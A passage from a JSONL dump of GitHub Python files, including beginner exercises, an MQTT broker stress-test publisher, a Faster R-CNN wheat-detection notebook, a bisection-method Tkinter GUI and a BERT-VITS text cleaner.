ax.view_init(10,50)\nax.set_zlim(0,10)\nplt.show()\n","repo_name":"akrajewska/cost-prophet","sub_path":"cost_prophet/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70748621372","text":"class Pessoa:\n def __init__ (self, email):\n self.email = email\n \n def Saudacao(name):\n print(f'Olá eu sou {name}')\n \nclass Estudante(Pessoa):\n def __init__(self, email, nome):\n super().__init__(email, nome)\n self.nome = nome\n \nclass Professor(Pessoa):\n def __init__(self, email, nome, materia):\n super().__init__(email, nome, materia)\n self.nome = nome\n self.materia = materia\n \np2 = Professor\np2.email = 'Luisa@gmail.com'\np2.nome = 'Luisa'\np2.materia ='Artes'\np2.Saudacao(p2.nome)\nprint(f'A {p2.nome} professora de {p2.materia}, está fazendo login com o email:{p2.email}')\n\n\ne1 = Estudante\ne1.email = 'maria@gmail.com'\ne1.nome = 'maria'\ne1.Saudacao(e1.nome)\nprint(f'A aluna {e1.nome} está fazendo login com o email:{e1.email}')\n\n\n\n\n\n\n","repo_name":"MaVieiraa/portifolio","sub_path":"exemplo/portifolio.py","file_name":"portifolio.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27357624910","text":"#! c:\\python34\\python3\n#!/usr/bin/env python\nimport signal\nimport time\nimport json\nimport random\nimport paho.mqtt.client as paho\n# edit these settings\nbroker = \"192.168.1.64\"\nport = 1883\nblocks = 25 # edit for number of blocks\nmessages = 200 # edit for stress messages per block (total msg = messages+(messages*esps))\nmessage_size = 1 # edit for size of message\nM_delay = 0.00001 # delay between messages\nLoop_delay = 2\npub_topic = \"v3/test\"\n\nesps = 200\nbles = 500\nesp_topic = \"espresense/rooms\"\ntotal_msg = messages+(messages*esps)\nusername = \"TestUser\"\npassword = \"TestPassword\"\n# end edit\n\n\ndef on_message(client, userdata, message):\n print(str(message.payload.decode(\"utf-8\")))\n\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n client.connected_flag = True # set flag\n print(\"connected OK\")\n client.subscribe(\"tests/results\")\n else:\n print(\"Bad connection Returned code=\", rc)\n\n\ndef stress_msg():\n c = str(count).rjust(6, \"0\")\n l = str(loop_count).rjust(6, \"0\")\n mro = str(int(message_rate)).rjust(6, \"0\")\n header = c+DL+l+DL+MS+DL+mro+DL\n header = header.ljust(40, \"P\")\n message = header + msg\n client.publish(pub_topic, message) # publish\n message = \"\"\n\n\ndef rand_mac():\n mac = [0x00, 0x24, 0x81,\n random.randint(0x00, 0x7f),\n random.randint(0x00, 0xff),\n random.randint(0x00, 0xff)]\n\n return ':'.join(map(lambda x: \"%02x\" % x, mac))\n\n\ndef esp_msg(esp_name):\n # {\"id\":\"bc7e8b2e9a71\",\"idType\":55,\"rssi@1m\":-71,\"rssi\":-95,\"raw\":4.85,\"distance\":5.18,\"speed\":-0.02,\"mac\":\"bc7e8b2e9a71\",\"interval\":2800}\n mac = random.choice(ble_macs)\n message = json.dumps({\n \"id\": mac,\n \"idType\": random.choice([15, 20, 40, 55]),\n \"rssi@1m\": -71,\n \"rssi\": random.randint(-95, -53),\n \"raw\": random.randint(0, 4)+random.random(),\n \"distance\": random.randint(0, 5)+random.random(),\n \"speed\": -0.02,\n \"mac\": mac,\n \"interval\": random.randint(300, 3000)})\n client.publish(esp_topic+\"/\"+esp_name, message) # publish\n\nesp_macs = []\nfor i in range(esps):\n esp_macs.append(rand_mac())\n\nble_macs = []\nfor i in range(bles):\n ble_macs.append(rand_mac())\n\nesp_message_size = len('{\"id\":\"bc7e8b2e9a71\",\"idType\":55,\"rssi@1m\":-71,\"rssi\":-95,\"raw\":4.85,\"distance\":5.18,\"speed\":-0.02,\"mac\":\"bc7e8b2e9a71\",\"interval\":2800}'.encode('utf-8'))\n\ncname=\"tx-client-\"+str(int(time.time()))\nclient=paho.Client(cname)\n# assign function to callback #establish connection client1.publish(\"house/bulb1\",\"on\")\n######\nif username != \"\":\n client.username_pw_set(username, password)\nclient.connected_flag=False\nclient.on_message=on_message\nclient.on_connect=on_connect\n#####\nprint(\"connecting to broker \", broker)\nclient.connect(broker, port) # connect\nclient.loop_start()\nwhile not client.connected_flag:\n time.sleep(.1)\nprint(\"subscribing \")\nclient.subscribe(\"test/results\") # subscribe\nprint(\"publishing \")\ncount=1\nmessage_rate=0\nloop_count=0\n\nBC=str(blocks).rjust(6, \"0\")\nMS=str(messages).rjust(6, \"0\")\nBS=str(message_size).rjust(6, \"0\")\nST=\"STARTXXX\"\nET=\"ENDXXXXX\"\nSB=\"X\"*8\nEB=\"Z\"*8\nDL=\"YY\"\nheader=\"\"\n\n\nmsg=\"!\"*message_size\nheader=ST+BC+MS+BS\nclient.publish(pub_topic, header) # publish\nwhile loop_count < blocks:\n # print(\"pub loop\")\n stime=time.time()\n client.publish(pub_topic, SB) # publish\n for count in range(1, messages+1):\n #client.loop(.001)\n stress_msg()\n #time.sleep(M_delay)\n for esp_name in esp_macs:\n esp_msg(esp_name)\n #time.sleep(M_delay)\n\n client.publish(pub_topic, EB) # publish\n time_taken=time.time()-stime\n print(f\"Time taken = {time_taken:.3f} \")\n message_rate=total_msg/time_taken\n print(f\"message rate {message_rate:.3f} messages per second\")\n message_rate=((messages*message_size)+(messages*esp_message_size))/time_taken\n print(f\"message rate {message_rate:.3f} Bytes per second\")\n\n time.sleep(Loop_delay)\n count=0\n loop_count += 1\n\nclient.publish(pub_topic, ET) # publish\ntime.sleep(20)\nclient.disconnect() # disconnect\nclient.loop_stop() # stop loop\n","repo_name":"Wrafttex/DRP7","sub_path":"broker-test/broker-stress-tests/esp-stress-test-tx.py","file_name":"esp-stress-test-tx.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"39772746944","text":"def reorderoddeven(arr):\n if len(arr) < 1:\n return\n pbegin = 0\n pend = len(arr)-1\n while pbegin < pend:\n while not is_even(arr[pbegin]):\n pbegin += 1\n while is_even(arr[pend]):\n pend -= 1\n if pbegin < pend:\n temp = arr[pbegin]\n arr[pbegin] = arr[pend]\n arr[pend] = temp\n\n\ndef is_even(num):\n if num & 1:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n test = [1, 2, 3, 4, 5]\n reorderoddeven(test)\n print(test)\n","repo_name":"zhulei2017/Python-Offer","sub_path":"sword-to-offer/14.1.py","file_name":"14.1.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71049308731","text":"import numpy as np\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nimport matplotlib.patches as patches\n\nimport cv2\n\nfrom os import listdir\n\nfrom os.path import isfile, join\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\nimport torch\n\nimport torchvision\n\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\n\nfrom torchvision.models.detection import FasterRCNN\n\nimport albumentations as A\n\nfrom albumentations.pytorch.transforms import ToTensorV2\nonlyfiles = [f for f in listdir('../input/global-wheat-detection/test/') if isfile(join('../input/global-wheat-detection/test/', f))]\n\n\n\ntest_df = pd.DataFrame(onlyfiles,columns=['image_id'])\ntransform = A.Compose([\n\n ToTensorV2(p=1.0)\n\n ])\n\n\n\n\n\ndef collate_fn(batch):\n\n return tuple(zip(*batch))\nclass WheatTestDataset(Dataset):\n\n\n\n def __init__(self, dataframe, transforms):\n\n super().__init__()\n\n\n\n self.image_ids = dataframe['image_id'].unique()\n\n self.df = dataframe\n\n self.transforms = transforms\n\n\n\n def __getitem__(self, index: int):\n\n\n\n image_id = self.image_ids[index]\n\n records = self.df[self.df['image_id'] == image_id]\n\n\n\n image = cv2.imread('../input/global-wheat-detection/test/'+image_id, cv2.IMREAD_COLOR)\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)\n\n image /= 255.0\n\n\n\n sample = {\n\n 'image': image,\n\n }\n\n sample = self.transforms(**sample)\n\n image = sample['image']\n\n\n\n return image, image_id\n\n\n\n def __len__(self) -> int:\n\n return self.image_ids.shape[0]\ntest_dataset = WheatTestDataset(test_df,transform)\n\n\n\ntest_data_loader = DataLoader(\n\n test_dataset,\n\n batch_size=8,\n\n shuffle=False,\n\n num_workers=4,\n\n collate_fn=collate_fn\n\n)\nmodel = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False,pretrained_backbone=False)\n\nnum_classes = 2\n\nin_features = model.roi_heads.box_predictor.cls_score.in_features\n\nmodel.roi_heads.box_predictor\nmodel.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\nmodel.roi_heads.box_predictor\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\nmodel.to(device)\nmodel.load_state_dict(torch.load('../input/global-wheat-detection-public/fasterrcnn_resnet50_fpn_best.pth'))\n\nmodel.eval()\ndef format_prediction_string(boxes, scores):\n\n pred_strings = []\n\n for j in zip(scores, boxes):\n\n pred_strings.append(\"{0:.4f} {1} {2} {3} {4}\".format(j[0], j[1][0], j[1][1], j[1][2], j[1][3]))\n\n\n\n return \" \".join(pred_strings)\ndetection_threshold = 0.5\n\nresults = []\n\ntestdf_psuedo = []\n\nfor images, image_ids in test_data_loader:\n\n\n\n images = list(image.to(device) for image in images)\n\n outputs = model(images)\n\n\n\n for i, image in enumerate(images):\n\n\n\n boxes = outputs[i]['boxes'].data.cpu().numpy()\n\n scores = outputs[i]['scores'].data.cpu().numpy()\n\n \n\n boxes = boxes[scores >= detection_threshold].astype(np.int32)\n\n scores = scores[scores >= detection_threshold]\n\n image_id = image_ids[i]\n\n \n\n boxes[:, 2] = boxes[:, 2] - boxes[:, 0]\n\n boxes[:, 3] = boxes[:, 3] - boxes[:, 1]\n\n \n\n for box in boxes:\n\n result = {\n\n 'image_id': 'nvnn'+image_id,\n\n 'source': 'nvnn',\n\n 'x': box[0],\n\n 'y': box[1],\n\n 'w': box[2],\n\n 'h': box[3]\n\n }\n\n testdf_psuedo.append(result)\ntest_df_pseudo = pd.DataFrame(testdf_psuedo, columns=['image_id', 'source', 'x', 'y', 'w', 'h'])\n\ntest_df_pseudo.head()\nimport cv2\n\nimg = cv2.imread(\"../input/global-wheat-detection/test/348a992bb.jpg\")\n\nimg = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\nfig,ax = plt.subplots(1)\n\nax.imshow(img)\n\nfor x,y,width,height in test_df_pseudo[test_df_pseudo['image_id'] == \"nvnn348a992bb.jpg\"][['x','y','w','h']].values:\n\n rect = patches.Rectangle((x,y),width,height,linewidth=1,edgecolor='r',facecolor='none')\n\n ax.add_patch(rect)\n\nplt.show()\ntrain_df = pd.read_csv(\"../input/global-wheat-detection/train.csv\")\n\ntrain_df.drop(['width','height'],axis=1,inplace=True)\ntrain_df['x'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[0])))\n\ntrain_df['y'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[1])))\n\ntrain_df['w'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[2])))\n\ntrain_df['h'] = train_df['bbox'].apply(lambda x: int(float(x[1:-1].split(',')[3])))\ntrain_df.drop('bbox',axis=1,inplace=True)\ntrain_df = pd.concat([train_df,test_df_pseudo],axis=0)\n\ntrain_df.reset_index(drop=True,inplace=True)\ntrain_df\ntransform = A.Compose([\n\n ToTensorV2(p=1.0)\n\n ], bbox_params={'format': 'pascal_voc', 'label_fields': ['labels']})\nclass WheatDataset(Dataset):\n\n\n\n def __init__(self, dataframe, transforms):\n\n super().__init__()\n\n\n\n self.image_ids = dataframe['image_id'].unique()\n\n self.df = dataframe\n\n self.transforms = transforms\n\n\n\n def __getitem__(self, index: int):\n\n\n\n image_id = self.image_ids[index]\n\n records = self.df[self.df['image_id'] == image_id]\n\n\n\n if 'nvnn' in image_id:\n\n image_id = image_id[4:]\n\n image = cv2.imread('../input/global-wheat-detection/test/'+image_id, cv2.IMREAD_COLOR)\n\n else:\n\n image = cv2.imread('../input/global-wheat-detection/train/'+image_id+'.jpg', cv2.IMREAD_COLOR)\n\n \n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)\n\n image /= 255.0\n\n\n\n boxes = records[['x', 'y', 'w', 'h']].values\n\n boxes[:, 2] = boxes[:, 0] + boxes[:, 2]\n\n boxes[:, 3] = boxes[:, 1] + boxes[:, 3]\n\n \n\n area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])\n\n area = torch.as_tensor(area, dtype=torch.float32)\n\n\n\n labels = torch.ones((records.shape[0],), dtype=torch.int64) \n\n iscrowd = torch.zeros((records.shape[0],), dtype=torch.int64)\n\n \n\n target = {}\n\n target['boxes'] = boxes\n\n target['labels'] = labels\n\n target['iscrowd'] = iscrowd\n\n target['area'] = area\n\n target['image_id'] = torch.tensor([index])\n\n\n\n sample = {\n\n 'image': image,\n\n 'bboxes': target['boxes'],\n\n 'labels': labels\n\n }\n\n sample = self.transforms(**sample)\n\n image = sample['image']\n\n\n\n target['boxes'] = torch.stack(tuple(map(torch.tensor, zip(*sample['bboxes'])))).permute(1, 0)\n\n return image, target, image_id\n\n\n\n def __len__(self) -> int:\n\n return self.image_ids.shape[0]\nclass Averager:\n\n def __init__(self):\n\n self.current_total = 0.0\n\n self.iterations = 0.0\n\n\n\n def send(self, value):\n\n self.current_total += value\n\n self.iterations += 1\n\n\n\n @property\n\n def value(self):\n\n if self.iterations == 0:\n\n return 0\n\n else:\n\n return 1.0 * self.current_total / self.iterations\n\n\n\n def reset(self):\n\n self.current_total = 0.0\n\n self.iterations = 0.0\ntrain_dataset = WheatDataset(train_df,transform)\ntrain_data_loader = DataLoader(\n\n train_dataset,\n\n batch_size=16,\n\n shuffle=False,\n\n num_workers=4,\n\n collate_fn=collate_fn\n\n)\nmodel.train()\nparams = [p for p in model.parameters() if p.requires_grad]\n\noptimizer = torch.optim.SGD(params, lr=0.01, momentum=0.9, weight_decay=0.0001)\nloss_hist = Averager()\n\n\n\nnum_epochs = 30\nitr = 1\n\n\n\nfor epoch in range(num_epochs):\n\n loss_hist.reset()\n\n \n\n for images, targets, image_ids in train_data_loader:\n\n \n\n images = list(image.to(device) for image in images)\n\n targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n\n\n\n loss_dict = model(images, targets)\n\n\n\n losses = sum(loss for loss in loss_dict.values())\n\n loss_value = losses.item()\n\n\n\n loss_hist.send(loss_value)\n\n\n\n optimizer.zero_grad()\n\n losses.backward()\n\n optimizer.step()\n\n\n\n if itr % 50 == 0:\n\n print(f\"Iteration #{itr} loss: {loss_value}\")\n\n\n\n itr += 1\n\n \n\n\n\n print(f\"Epoch #{epoch} loss: {loss_hist.value}\")\ntorch.save(model.state_dict(), 'fasterrcnn_resnet50_fpn2nd.pt')\nmodel.eval()\n\ndetection_threshold = 0.5\n\nresults = []\n\n\n\nfor images, image_ids in test_data_loader:\n\n\n\n images = list(image.to(device) for image in images)\n\n outputs = model(images)\n\n\n\n for i, image in enumerate(images):\n\n\n\n boxes = outputs[i]['boxes'].data.cpu().numpy()\n\n scores = outputs[i]['scores'].data.cpu().numpy()\n\n \n\n boxes = boxes[scores >= detection_threshold].astype(np.int32)\n\n scores = scores[scores >= detection_threshold]\n\n image_id = image_ids[i]\n\n \n\n boxes[:, 2] = boxes[:, 2] - boxes[:, 0]\n\n boxes[:, 3] = boxes[:, 3] - boxes[:, 1]\n\n \n\n result = {\n\n 'image_id': image_id,\n\n 'PredictionString': format_prediction_string(boxes, scores)\n\n }\n\n\n\n \n\n results.append(result)\ntest_df = pd.DataFrame(results, columns=['image_id', 'PredictionString'])\n\ntest_df['image_id'] = test_df['image_id'].apply(lambda x: x.split(\".\")[0])\n\ntest_df.head()\ntest_df.to_csv('submission.csv', index=False)","repo_name":"aorursy/new-nb-1","sub_path":"aakashveera_notebook-rcnn.py","file_name":"aakashveera_notebook-rcnn.py","file_ext":"py","file_size_in_byte":9424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28651062931","text":"# Se achar necessario, faça import de outras bibliotecas\n\n\n\n\n\n# Crie a função que será avaliada no exercício aqui\ndef soma_dos_aninhados(lista):\n soma = 0\n for sublist in lista:\n for numero in sublist:\n soma += numero\n return soma\n\nlista_de_listas = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10], [11, 12, 13, 14, -1000]]\n\nresultado = soma_dos_aninhados(lista_de_listas)\nprint(resultado)\n\n\n\n\n\n\n\n# Teste a sua função aqui (caso ache necessário)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Modulo3-Inteli-2023-1/lista-semana1-y2keylla","sub_path":"exercicio3.py","file_name":"exercicio3.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2388087208","text":"import os\nfrom pathlib import Path\nimport json\nimport jsonlines\nfrom argparse import ArgumentParser\nimport random\n\n\ndef get_data_by_sz(data_path, data_size, dir_name):\n path = Path(data_path)\n data_files = [os.path.join(path, file.name) for file in path.glob(\"*.json\")]\n for data_file in data_files:\n data = []\n with open(data_file, \"r\", encoding=\"utf8\") as f:\n for line in f:\n data.append(json.loads(line))\n\n file_name = \"_\".join(os.path.split(data_file)[-1].split(\"_\")[:-1])\n\n if isinstance(data_size, int):\n assert len(data) >= data_size\n selected_data = random.sample(data, k=data_size)\n elif isinstance(data_size, dict):\n if file_name in data_size:\n sz = data_size[file_name]\n elif data_size[\"others\"] == \"uniform\":\n sz = 1305 # uniformly replenish data from other abilities\n if file_name==\"biology\":\n sz = None # use all biology data as its full size may not be sufficient\n elif file_name==\"chinese\":\n sz += 1 # add the reminder to keep the total quantity == 10k.\n elif data_size[\"others\"] == \"max\":\n sz = None # use all available data for other abilities\n selected_data = data[:sz]\n\n file_name = \"_\".join(os.path.split(data_file)[-1].split(\"_\")[:-1])\n with jsonlines.open(dir_name + \"/\" + file_name + \".json\", \"w\") as writer:\n for sample in selected_data:\n writer.write(sample)\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\n \"--data_type\", type=str, default=None,\n choices=[\"curated-10\", \"curated-40\", \"curated-160\", \"curated-640\", \"curated-2560\", \"curated-10000\",\n \"synthetic-10\", \"synthetic-40\", \"synthetic-160\", \"synthetic-640\", \"synthetic-2560\", \"synthetic-10000\",\n \"synthetic-40960\", \"baseline\", \"reconstruct\", \"maximum\", \"mix-0\", \"mix-2560\", \"mix-40960\"]\n )\n args = parser.parse_args()\n\n random.seed(0)\n dir_name = \"data/\" + args.data_type\n os.makedirs(dir_name, exist_ok=True)\n\n if args.data_type == \"baseline\":\n args.data_type = \"curated-10000\"\n print(\"Type 'baseline' is equivalent to 'curated-10000'.\")\n\n if args.data_type == \"mix-0\":\n args.data_type = \"maximum\"\n print(\"Type 'mix-0' is equivalent to 'maximum'.\")\n\n if \"curated\" in args.data_type:\n data_path = \"data/curated/1000\"\n data_size = int(args.data_type.split(\"-\")[-1]) // 10\n get_data_by_sz(data_path, data_size, dir_name)\n elif \"synthetic\" in args.data_type:\n data_path = \"data/synthetic/40960\"\n data_size = int(args.data_type.split(\"-\")[-1])\n get_data_by_sz(data_path, data_size, dir_name)\n elif args.data_type == \"reconstruct\":\n data_path = \"data/curated/full\"\n data_size = {\"ethics\":64, \"role_play\":64, \"creative_writing\":1000, \"others\": \"uniform\"}\n get_data_by_sz(data_path, data_size, dir_name)\n elif args.data_type == \"maximum\":\n data_path = \"data/curated/full\"\n data_size = {\"ethics\":64, \"role_play\":64, \"creative_writing\":1000, \"others\": \"max\"}\n get_data_by_sz(data_path, data_size, dir_name)\n elif \"mix\" in args.data_type:\n # mix two data sources\n data_path = \"data/curated/full\"\n data_size = {\"ethics\": 64, \"role_play\": 64, \"creative_writing\": 1000, \"others\": \"max\"}\n get_data_by_sz(data_path, data_size, dir_name)\n\n data_path = \"data/synthetic/40960\"\n data_size = int(args.data_type.split(\"-\")[-1])\n get_data_by_sz(data_path, data_size, dir_name)\n\n print(\"Make Data Done!\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ChiyuSONG/dynamics-of-instruction-tuning","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"23312381328","text":"import tkinter\nfrom customtkinter import *\nfrom tkinter import messagebox\nfrom math import *\n\n\ndef f(x, exp):\n # Using eval() safely in Python ref: https://lybniz2.sourceforge.net/safeeval.html\n safe_list = ['math', 'acos', 'asin', 'atan', 'atan2', 'ceil', 'cos', 'cosh', 'degrees', 'e', 'exp', 'fabs', 'floor',\n 'fmod', 'frexp', 'hypot', 'ldexp', 'log', 'log10', 'modf', 'pi', 'pow', 'radians', 'sin', 'sinh', 'sqrt', 'tan', 'tanh']\n # use the list to filter the local namespace\n safe_dict = dict([(k, locals().get(k, k)) for k in safe_list])\n safe_dict['x'] = x\n return (eval(exp, {\"__builtins__\": None}, safe_dict))\n\n\ndef bisect(a, b, es, imax, f, exp):\n i = 0\n c = b\n fa = f(a, exp)\n fc = f(b, exp)\n res = [[\"iterasi\", \"a\", \"b\", \"c\", \"f(a)\", \"f(c)\", \"f(a).f(c)\", \"e\"]]\n\n if (fa * fc > 0):\n return -1\n\n while (True):\n # cold = c\n c = (a + b) / 2\n fc = f(c, exp)\n i += 1\n\n if (c != 0):\n # ea = abs((c - cold) / c)\n ea = abs(fc)\n\n test = fa * fc\n\n res.append([\n \"{}\".format(i), \"{:.6f}\".format(a), \"{:.6f}\".format(b),\n \"{:.6f}\".format(c), \"{:.6f}\".format(fa), \"{:.6f}\".format(fc),\n \"{:.6f}\".format(test), \"{:.6f}\".format(ea)\n ])\n\n if (test < 0):\n b = c\n elif (test > 0):\n a = c\n fa = fc\n else:\n ea = 0\n\n if (ea < es or i >= imax):\n break\n\n return [res, c, ea, i]\n\n\nclass InputFrame(CTkFrame):\n def __init__(self, master):\n super().__init__(master)\n self.grid_columnconfigure(3, weight=1)\n self.grid_rowconfigure(2, weight=1)\n\n # Expression Input\n self.exp_label = CTkLabel(\n self, text=\"Fungsi\", fg_color=\"gray30\", corner_radius=6)\n self.exp_label.grid(\n row=0, column=0, padx=10, pady=(10, 0), sticky=\"ew\", columnspan=2)\n self.exp_entry = CTkEntry(self, corner_radius=6)\n self.exp_entry.grid(row=0, column=2, padx=10, pady=(\n 10, 0), sticky=\"ew\", columnspan=2)\n\n # Interval (a & b) Input\n self.a_label = CTkLabel(\n self, text=\"Batas Bawah\", fg_color=\"gray30\", corner_radius=6)\n self.a_label.grid(\n row=1, column=0, padx=10, pady=(10, 0), sticky=\"ew\")\n self.a_entry = CTkEntry(self, corner_radius=6)\n self.a_entry.grid(\n row=1, column=1, padx=10, pady=(10, 0), sticky=\"ew\")\n self.b_label = CTkLabel(\n self, text=\"Batas Atas\", fg_color=\"gray30\", corner_radius=6)\n self.b_label.grid(\n row=1, column=2, padx=10, pady=(10, 0), sticky=\"ew\")\n self.b_entry = CTkEntry(self, corner_radius=6)\n self.b_entry.grid(\n row=1, column=3, padx=10, pady=(10, 0), sticky=\"ew\")\n\n self.es_label = CTkLabel(\n self, text=\"Toleransi Error\", fg_color=\"gray30\", corner_radius=6)\n self.es_label.grid(\n row=2, column=0, padx=10, pady=10, sticky=\"ew\")\n self.es_entry = CTkEntry(self, corner_radius=6)\n self.es_entry.grid(\n row=2, column=1, padx=10, pady=10, sticky=\"ew\")\n self.imax_label = CTkLabel(\n self, text=\"Iterasi Maksimum\", fg_color=\"gray30\", corner_radius=6)\n self.imax_label.grid(\n row=2, column=2, padx=10, pady=10, sticky=\"ew\")\n self.imax_entry = CTkEntry(self, corner_radius=6)\n self.imax_entry.grid(\n row=2, column=3, padx=10, pady=10, sticky=\"ew\")\n\n def get_exp(self):\n return self.exp_entry.get()\n\n def get_a(self):\n return self.a_entry.get()\n\n def get_b(self):\n return self.b_entry.get()\n\n def get_es(self):\n return self.es_entry.get()\n\n def get_imax(self):\n return self.imax_entry.get()\n\n def reset(self):\n self.exp_entry.delete(0, END)\n self.a_entry.delete(0, END)\n self.b_entry.delete(0, END)\n self.es_entry.delete(0, END)\n self.imax_entry.delete(0, END)\n\n\nclass ButtonFrame(CTkFrame):\n def __init__(self, master):\n super().__init__(master)\n self.grid_columnconfigure(1, weight=1)\n\n self.calc_button = CTkButton(\n self, text=\"Hitung\", command=master.calculate)\n self.calc_button.grid(\n row=0, column=0, padx=10, pady=0, sticky=\"ew\")\n self.reset_button = CTkButton(\n self, text=\"Reset\", command=master.reset, state=DISABLED)\n self.reset_button.grid(\n row=0, column=1, padx=10, pady=0, sticky=\"ew\")\n\n\nclass App(CTk):\n def __init__(self):\n super().__init__()\n\n self.title(\"Metode Biseksi\")\n self.geometry(\"685x560\")\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(3, weight=1)\n\n self.title_label = CTkLabel(\n self, text=\"Metode Biseksi\", fg_color=\"transparent\", corner_radius=6, font=CTkFont(size=20, weight='bold'))\n self.title_label.grid(row=0, column=0, padx=10,\n pady=(10, 0), sticky=\"ew\")\n\n self.input_frame = InputFrame(self)\n self.input_frame.grid(row=1, column=0, padx=10,\n pady=(10, 0), sticky=\"\")\n\n self.button_frame = ButtonFrame(self)\n self.button_frame.grid(row=2, column=0, padx=10,\n pady=(10, 0), sticky=\"\")\n self.button_frame.configure(fg_color=\"transparent\")\n self.result_frame = None\n\n def calculate(self):\n exp = self.input_frame.get_exp()\n a = self.input_frame.get_a()\n b = self.input_frame.get_b()\n es = self.input_frame.get_es()\n imax = self.input_frame.get_imax()\n\n if (exp == \"\" or a == \"\" or b == \"\" or es == \"\" or imax == \"\"):\n messagebox.showerror(\n title=\"Error!\",\n message=\"Input tidak boleh kosong!\"\n )\n return\n\n exp = str(exp)\n a = float(a)\n b = float(b)\n es = float(es)\n imax = int(imax)\n\n if (b <= a):\n messagebox.showerror(\n title=\"Error!\",\n message=\"Batas Atas tidak boleh kurang dari atau sama dengan Batas Bawah!\"\n )\n return\n\n if (imax < 1):\n messagebox.showerror(\n title=\"Error!\",\n message=\"Iterasi maksimum tidak boleh kurang dari 1!\"\n )\n return\n\n result = bisect(a, b, es, imax, f, exp)\n if (result == -1):\n messagebox.showerror(\n title=\"Syarat tidak terpenuhi!\",\n message=\"f(a).f(b) > 0\\nAkar tidak ditemukan! Proses dihentikan.\"\n )\n return\n\n self.result_frame = CTkScrollableFrame(self)\n self.result_frame.grid(row=3, column=0, padx=10,\n pady=10, sticky=\"nsew\")\n\n [res, c, ea, i] = result\n for i in range(len(res)):\n for j in range(len(res[0])):\n entry = CTkEntry(self.result_frame,\n justify=\"center\", corner_radius=0, width=80)\n entry.grid(row=i, column=j)\n entry.insert(0, res[i][j])\n entry.configure(state=DISABLED)\n\n self.button_frame.calc_button.configure(state=DISABLED)\n self.button_frame.reset_button.configure(state=NORMAL)\n messagebox.showinfo(\n title=\"Hasil\",\n message=\"Dihasilkan hampiran akar = {:.6f}\".format(c)\n + \" dengan error = {:.6f}\".format(ea)\n + \" dan iterasi = {}\".format(i)\n )\n\n def reset(self):\n self.result_frame.grid_forget()\n self.input_frame.reset()\n self.button_frame.reset_button.configure(state=DISABLED)\n self.button_frame.calc_button.configure(state=NORMAL)\n\n\ndef main():\n set_appearance_mode(\"dark\")\n set_default_color_theme(\"blue\")\n\n app = App()\n\n app.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MrPuppeteer/bisect","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42699628207","text":"import importlib\nfrom bert_vits2.text import cleaned_text_to_sequence\n\nlanguage_module_map = {\n 'zh': \"bert_vits2.text.chinese\",\n 'ja': \"bert_vits2.text.japanese\"\n}\n\n_loaded_modules = {}\n\n\ndef get_language_module(language):\n if language not in _loaded_modules:\n module_path = language_module_map.get(language)\n if not module_path:\n raise ValueError(f\"Unsupported language: {language}\")\n\n _loaded_modules[language] = importlib.import_module(module_path)\n\n return _loaded_modules[language]\n\n\ndef clean_text(text, language):\n language_module = get_language_module(language)\n norm_text = language_module.text_normalize(text)\n phones, tones, word2ph = language_module.g2p(norm_text)\n return norm_text, phones, tones, word2ph\n\n\ndef clean_text_bert(text, language):\n language_module = get_language_module(language)\n norm_text = language_module.text_normalize(text)\n phones, tones, word2ph = language_module.g2p(norm_text)\n bert = language_module.get_bert_feature(norm_text, word2ph)\n return phones, tones, bert\n\n\ndef text_to_sequence(text, language):\n norm_text, phones, tones, word2ph = clean_text(text, language)\n return cleaned_text_to_sequence(phones, tones, language)\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"NEKOparapa/MeidoAGI","sub_path":"vits/vits-simple-api/bert_vits2/text/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38233652684","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Example usage and tests for :mod:`kleio.core.io.resolve_config`.\"\"\"\n\nimport os\nimport socket\n\nimport pytest\n\nimport kleio.core.io.resolve_config as resolve_config\n\n\n@pytest.fixture\ndef 